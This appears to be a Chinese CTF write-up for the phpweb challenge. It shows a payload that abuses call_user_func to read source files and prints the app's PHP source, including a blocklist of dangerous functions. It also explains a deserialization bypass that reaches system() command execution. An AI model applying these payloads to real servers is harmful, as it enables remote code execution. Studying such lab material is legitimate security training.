[网鼎杯 2020 朱雀组]phpweb(各种读取文件函数,call_user_func()函数和序列化绕过)

最新推荐文章于 2021-12-08 16:59:01 发布
最新推荐文章于 2021-12-08 16:59:01 发布
阅读量825 收藏
点赞数
分类专栏: wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44111753/article/details/113665613
版权

知识点

  • 读取文件的方法
    readfile,file_get_contents,highlight_file

  • call_user_func()

第一个参数 callbac 是被调用的回调函数,其余参数是回调函数的参数

在这里插入图片描述

  • 序列化

题解:
由于页面不断刷新,所以抓包分析下
在这里插入图片描述
post传入了参数data和一串类似日期格式的东西
合理推测是使用了call_user_func()函数,并将date()作为回调函数,由此输出了上面红色框部分

func=readfile&p=index.php

读取index.php源码

<?php
    $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
    function gettime($func, $p) {
        $result = call_user_func($func, $p);
        $a= gettype($result);
        if ($a == "string") {
            return $result;
        } else {return "";}
    }
    class Test {
        var $p = "Y-m-d h:i:s a";
        var $func = "date";
        function __destruct() {
            if ($this->func != "") {
                echo gettime($this->func, $this->p);
            }
        }
    }
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];

    if ($func != null) {
        $func = strtolower($func);
        if (!in_array($func,$disable_fun)) {
            echo gettime($func, $p);
        }else {
            die("Hacker...");
        }
    }
?>

发现过滤了绝大多数的命令,也确实是调用了 gettime()里面的call_user_func($func, $p);函数。注意Test的魔术方法__destruct()中也调用了gettime(),意味着我们可以尝试序列化然后url编码绕过过滤,并且在反序列化回来时,调用gettime()里面的call_user_func($func, $p);从而达到命令执行目的。
首先func=unserialize,再次注意Test

class Test {
        var $p = "Y-m-d h:i:s a";
        var $func = "date";
        function __destruct() {
            if ($this->func != "") {
                echo gettime($this->func, $this->p);
            }
        }
    }

达到命令执行目的的话,func要设为我们需要调用system等webshell,p设置成要执行的命令,例如$func =system, $p=find / -name 'flag*'
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
找到了flag所在的文件,直接读取即可
在这里插入图片描述

行于其野
关注
专栏目录
phpweb-[网鼎杯 2020 朱雀]-[BUUCTF]
qwsn
11-23 2050
0x01、Web 1.phpweb-[网鼎杯 2020 朱雀]-[传送门->BUUCTF] 第一步:点击传送门,打开题目环境 观察题目页面: //打开网页观察网页显示动态,发现网页每隔一段时间会刷新一下,说明可能自动间隔一段时间刷新一次,观察网页,网页上会显示一段warning信息,并提示了data()函数。 //利用BurpSuite拦截网页,看一下有什么异常。观察发现网页会传递两个参数,func和p。func对应的值为date,p对应的值为一串时间格式,说明网页可能向后端传递函数名及其对应的参数
[ctf web]web题中php经常遇到的函数
ShenZ的博客
07-24 1238
函数 substr call_user_func 把第一个参数作为回调函数调用 版本 说明 5.3.0 对面向对象里面的关键字的解析有所增强。在此之前,使用两个冒号来连接一个类和里面的一个方法,把它作为参数来作为回调函数的话,将会发出一个**E_STRICT**的警告,因为这个传入的参数被视为静态方法。 用call_user_func()来调用一个类里面的方法 <?php class myclass { static function say_hello() {
关于call_user_func的一点心得
那些花儿
12-12 1102
好久没写博客实在是惭愧,最近写一个控制器程序,程序获取页面提交参数为程序中一个类的方法。 比如,页面有不同的按钮可以让用户触发 getMethod_A  和  getMethod_B  ... getMethod_N ,  控制器在得到参数之后如何调用类中对应的方法? 就需要用到call_user_func 。  按手册照葫芦画瓢的话: $act = $_POST[act];
call_user_fun()函数的使用
weixin_34161032的博客
04-21 348
2019独角兽企业重金招聘Python工程师标准>>> ...
读入网页文件c语言,【转载】VBA读取一个来自web服务器或网站文件的函数
weixin_39848970的博客
05-24 142
时 间:2014-04-29 09:25:45作 者:摘 要:VBA读取一个来自web服务器或网站的文件的函数正 文:'-----------------------------------------------------------------------------' Procedure : ReadURLFile' Author : Daniel Pineault, CARDA Cons...
call_user_func()详解
Baymax001的博客
06-07 8673
先来看解释 : (PHP 4, PHP 5, PHP 7) call_user_func — 把第一个参数作为回调函数调用 通过函数的方式回调 <?php function barber($type){ echo "you wanted a $type haircut, no problem\n"; } call_user_func('barber','mushroom')
buu做题笔记——[网鼎杯 2020 朱雀]phpweb&[SWPU2019]Web1
weixin_46330722的博客
11-06 1549
BUU[网鼎杯 2020 朱雀]phpweb [网鼎杯 2020 朱雀]phpweb 页面看不出啥,抓个包看看。 从包中我们可以看到,传递了两个参数,func和p。func的值是date,再结合p的值,我猜测这里是用了call_user_func()来回调函数,即将func的值当作函数名,p的值当作参数。那么我们直接使用system函数查看当前目录下的文件 回显Hacker,应该是被waf拦了,用highlight_file()看一下源码 <?php $disable_fun = arr
网鼎杯2020朱雀-web
ChenZIDu的博客
05-18 3083
nmap那题就基本命令然后还有一个别的方法。 nmap 源码 index.php <? require('settings.php'); set_time_limit(0); if (isset($_POST['host'])): if (!defined('WEB_SCANS')) { die('Web scans disabled'); } $host = $_POST['host']; if(stripos($host,'php')!==false){ di
C语言 —— 预定义符号__FILE____LINE___func__(编写调试函数printf , debug)
杰儿__er 的博客
07-20 5994
C的预定义符号: __FILE__ __LINE__ __func__   测试代码:在文件 line.c 中 1 #include &lt;stdio.h&gt; 2 int main() 3 { 4 printf("%s\n",__FILE__); 5 printf("%d\n",__LINE__); 6 printf("%s\n",__func__...
func函数的功能python_Python不同功能的函数
weixin_39534121的博客
12-17 3080
函数作为参数import mathdef add(x,y,f):return f(x) + f(y)print add(25,36,math.sqrt)•map()函数map()是 Python 内置的高阶函数,它接收一个函数 f和一个list,并通过把函数 f 依次作用在 list 的每个元素上,得到一个新的 list 并返回。注意:map()函数不改变原有的 list,而是返回一个新的 ...
php中call_user_func函数使用注意事项
10-25
主要介绍了php中call_user_func函数使用注意事项,较为详细的讲述了call_user_func函数的用法实例与注意事项,具有一定的参考借鉴价值,需要的朋友可以参考下
bestphp‘s revenge SoapClient php处理器反序列化 call_user_func
scrawman的博客
12-08 658
bestphp’s revenge 这道题的知识点还挺多的 源码文件有两个:index.php和flag.php <?php highlight_file(__FILE__); $b = 'implode'; call_user_func($_GET['f'], $_POST); session_start(); if (isset($_GET['name'])) { $_SESSION['name'] = $_GET['name']; } var_dump($_SESSION); $a =
PHP学习——15 PHP函数(回调调用函数call_user_func_array、文件导入与包含、匿名函数与闭包的实现)
前端老兵
10-10 693
一、用回调方式调用对象或类的方法 &lt;?php // call_user_func_array() 自定义回调函数函数 // 它提供了另外一种调用函数的解决方案 class demo{ static function func1($lang){ return '我是'.$lang.'语言攻城狮!'; } public function func2($lang){ retu...
php soap call_user_func_array,session_start()&bestphp
weixin_39660408的博客
04-04 273
前言又是周末,又是CTF,还是pupil出的题,只能说,非常有趣了bestphpbestphp’s revenge前者来自xctf final,后者来自2018LCTFbestphp1文件包含拿到题目后发现代码非常简短,但是问题很明确,我们看到了函数call_user_func($func,$_GET);这里想到的第一反应是利用extract进行变量覆盖,从而达到任意文件包含例如:?functio...
----已搬运----【总章程】SSRF完全学习,,什么都有,,,原理,绕过,攻击
Zero_Adam的博客
06-11 1579
学习自WHOAMI大佬的, 感觉囊括了 SSRF 的所有知识点了。既有CTF的东西,又有实战的东西!
CTF命令执行及绕过技巧
热门推荐
JBlock的博客
03-07 2万+
前言 今天是代码审计部分的一个技巧补充!前些阵子做了sql注入回顾篇系列!今天开启php代码审计系列! 今天内容主要是CTF中命令注入及绕过的一些技巧!以及构成RCE的一些情景! 文章目录前言正文代码执行代码执行的几种方式命令执行常见命令执行函数绕过姿势敏感字符绕过处理无回显的命令执行Think one Think 正文 在详细介绍命令注入之前,有一点需要注意:命令注入与远程代码执行不同。他们的区...
个人对于webshell的理解
云梦逸兮的博客
06-19 9921
0x001.前言简介 webshell是以asp、php、jsp等网页文件形式存在的一种命令执行环境,也称其为一种网页后门。一般说来,当Hacker入侵一个网站后,会把这些asp、php木马的后门文件放在该网站的web目录中,和正常的网页文件混杂,其命名可能和正常的文件命名很类似,让人无法第一眼通过文件名判断其为后门文件。然后呢,他就可以利用web请求的方式,用asp或者php木马后门控制网站服...
Webshell总结
qq_39345447的博客
04-09 775
命令执行漏洞 命令执行直接调用操作系统命令。其原理是,在操作系统中,“&、|、||”都可以作为命令连接符使用,用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,将用户的输入作为系统命令的参数拼接到命令行中,在没有过滤用户输入的情况下,造成命令执行漏洞。 command1&command2 两个命令同时执行 command1&&command2 ...
PHP绕过disable_function
shy的博客
12-02 1512
disable_functions 为了服务器的安全,我们可以设置PHP禁止运行一些危险的函数。 设置方法 将需要禁止运行的函数写入到php.ini当中的disable_functions中。 phpinfo,eval,passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,ini_alter,ini_alter,ini_restore,dl,pfsockopen,openlog,sys
解释PHP内置函数call_user_func
最新发布
03-06
call_user_funcPHP的一个内置函数,它允许您调用一个函数或方法,而不需要明确指定函数名或方法名。相反,您可以将函数名或方法名作为字符串传递给call_user_func,然后将任何参数作为可选参数传递给该函数或方法。这使得您可以在运行时动态地调用函数或方法,而不需要在编写代码时硬编码函数或方法的名称。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值